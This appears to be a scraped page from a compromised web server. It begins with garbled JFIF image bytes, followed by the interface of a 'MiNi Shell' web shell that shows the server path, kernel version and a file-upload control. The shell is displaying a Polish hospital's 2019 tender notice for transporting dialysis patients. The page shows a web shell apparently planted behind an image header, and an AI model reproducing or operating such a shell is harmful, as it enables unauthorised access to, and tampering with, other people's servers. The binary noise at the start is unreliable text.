JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20190618/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20190618/560561-N-2019.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 560561-N-2019 z dnia 2019-06-18 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Szpital Wojewódzki</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Realizacja usług transportowych w zakresie przewozu osób dializowanych dla Szpitala Wojewódzkiego w Bielsku-Białej</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Szpital Wojewódzki</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">70621590000000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">al. Armii Krajowej</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">101</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">43-316</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Bielsko-Biała</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">śląskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">338 100 143</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">przetargi@hospital.com.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">338 102 101</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">https://www.hospital.com.pl/</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Inny (proszę określić):</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny">Samodzielny publiczny zakład opieki zdrowotnej</span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">https://www.hospital.com.pl/</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony">Szpital Wojewódzki w Bielsku-Białej Al. Armii Krajowej 101, 43-316 Bielsko-Biała</span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23 listopada 2012 r. - Prawo pocztowe (t. j. Dz. U. z 2018r. poz. 2188 ze zm.), osobiście, za pośrednictwem posłańca</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Szpital Wojewódzki w Bielsku-Białej, Al. Armii Krajowej 101, 43-316 Bielsko-Biała (III piętro, pokój 302)</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Realizacja usług transportowych w zakresie przewozu osób dializowanych dla Szpitala Wojewódzkiego w Bielsku-Białej</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">33/19</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1. Przedmiotem zamówienia jest realizacja usług transportowych w zakresie przewozuosób dializowanych: chodzących, poruszających się na wózkach inwalidzkich oraz wymagającychprzewozu w pozycji leżącej na noszach dla Szpitala Wojewódzkiego w Bielsku-Białej Al. ArmiiKrajowej 101, 43-316 Bielsko-Biała. 2. Wykonanie przedmiotu zamówienia nastąpi na podstawie: 1)wymagań zawartych w opisie przedmiotu zamówienia, stanowiącym Załącznik Nr 2 do SpecyfikacjiIstotnych Warunków Zamówienia, zwanej dalej ,,siwz"; 2) postanowień zawartych we wzorze umowystanowiącym Załącznik Nr 9 do siwz. 3. Wykonanie przedmiotu zamówienia będzie się odbywać na koszt i ryzyko Wykonawcy. 4. Wykonawca jest zobowiązany, aby wszystkie osoby wykonująceczynności przewozu osób dializowanych w okresie realizacji zamówienia, były zatrudnione napodstawie umowy o pracę oraz spełniały warunki udziału w postępowaniu określone w Sekcji III.1.3)pkt 3). 5. Sposób dokumentowania zatrudnienia osób, o których mowa w ust. 4 oraz uprawnieniaZamawiającego w zakresie kontroli spełnienia przez Wykonawcę wymagania dotyczącegozatrudniania tych osób na podstawie umowy o pracę i sankcji z tytułu niespełnienia tych wymagań,zostały określone we wzorze umowy.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">60130000-8</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach">12</span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">1. Niniejsze postępowanie prowadzone jest w trybie przetargunieograniczonego na podstawie art. 39 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych(t. j. Dz.U. z 2018r. poz. 1986 ze zm.), zwana dalej ,,ustawą pzp". 2. Wartość szacunkowa zamówienianie przekracza kwoty określonej w przepisach wydanych na podstawie art. 11 ust. 8 ustawy pzp, tj. nie przekracza wyrażonej w złotych równowartości kwoty 221 000 euro.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">1. O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy spełniająwarunki udziału w postępowaniu dotyczące uprawnień do prowadzenia określonej działalnościzawodowej określone w ust. 2. 2. Określenie warunków dotyczących uprawnień do prowadzeniaokreślonej działalności zawodowej - Ocena spełniania warunków udziału w postępowaniu, zostaniedokonana na podstawie analizy formalno-prawnej i merytorycznej oświadczeń i dokumentówzłożonych przez Wykonawcę według formuły ,,spełnia - nie spełnia" w następujący sposób:Zamawiający uzna, że Wykonawca spełnia warunek dotyczący uprawnień do prowadzeniaokreślonej działalności zawodowej, jeżeli Wykonawca złoży aktualne zezwolenie lub licencję nazarobkowy przewóz osób wydane na podstawie art. 7 ust. 2 pkt 1 ustawy z dnia 6 września 2001r. otransporcie drogowym (t. j. Dz. U. z 2019r. poz. 58 ze zm.). W przypadku gdy zezwolenie lublicencja nie jest wymagana - stosowne oświadczenie.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">1. O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy spełniająwarunki udziału w postępowaniu dotyczące sytuacji ekonomicznej określone w ust. 2. 2. Określeniewarunków dotyczących sytuacji ekonomicznej - Ocena spełniania warunków udziału wpostępowaniu, zostanie dokonana na podstawie analizy formalno-prawnej i merytorycznejoświadczeń i dokumentów złożonych przez Wykonawcę według formuły ,,spełnia - nie spełnia" wnastępujący sposób: Zamawiający uzna, że Wykonawca spełnia warunek dotyczący sytuacjiekonomicznej, jeżeli Wykonawca złoży dokumenty potwierdzające, że wykonawca jestubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej zprzedmiotem zamówienia na sumę gwarancyjną nie niższą niż 300.000,00 złotych polskich. 3.Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, wstosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać nasytuacji ekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączących go z nimstosunków prawnych.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">1. O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy spełniająwarunki udziału w postępowaniu dotyczące zdolności technicznej i zawodowej określone w ust. 2.2. Określenie warunków dotyczących zdolności technicznej i zawodowej - Ocena spełnianiawarunków udziału w postępowaniu, zostanie dokonana na podstawie analizy formalno-prawnej imerytorycznej oświadczeń i dokumentów złożonych przez Wykonawcę według formuły ,,spełnia -nie spełnia" w następujący sposób: 1) Zamawiający uzna, że Wykonawca spełnia warunekdotyczący doświadczenia Wykonawcy, jeżeli w okresie ostatnich 3 lat przed upływem terminuskładania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykażenależyte wykonanie lub wykonywanie dwóch usług transportowych w zakresie przewozu osób doszpitalnych stacji dializ, z których: a) minimum jedna obejmuje lub obejmowała swym zakresemprzewóz minimum 40 osób dziennie; b) każda realizowana była (w przypadku usług wykonanych)lub zrealizowana jest (w przypadku usług wykonywanych) przez okres minimum 12 miesięcy.Wzór wykazu usług stanowi Załącznik Nr 6 do siwz. 2) Zamawiający uzna, że Wykonawca spełniawarunek dotyczący potencjału technicznego Wykonawcy, jeżeli Wykonawca w wykazie pojazdówstanowiącym treść oferty - Załącznik Nr 1 do siwz ,,Formularz ofertowy" ust. 5 wykaże, żeposiada/dysponuje przez cały okres realizacji umowy minimum pięcioma pojazdami. Pojazdybędące w posiadaniu/dysponowaniu Wykonawcy muszą spełniać warunki określone w ust. 9 opisuprzedmiotu zamówienia stanowiącym Załącznik Nr 2 do siwz. Wzór wykazu pojazdów stanowiZałącznik Nr 7 do siwz. 3) Zamawiający uzna, że Wykonawca spełnia warunek dotyczący osóbskierowanych przez Wykonawcę do realizacji zamówienia, jeżeli Wykonawca w wykazie osóbskierowanych przez Wykonawcę do realizacji zamówienia, wykaże, że dysponuje minimum 6osobami, z których każda posiada: a) wymagane prawo jazdy; b) aktualne orzeczenie lekarskie dlapełnionego zawodu; c) aktualne świadectwo przeszkolenia w zakresie udzielania pierwszej pomocy.Wzór osób stanowi Załącznik Nr 8 do siwz. 2. Wykonawca może w celu potwierdzenia spełnianiawarunków udziału w postępowaniu, w stosownych sytuacjach oraz w odniesieniu do konkretnegozamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych innychpodmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)</span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w 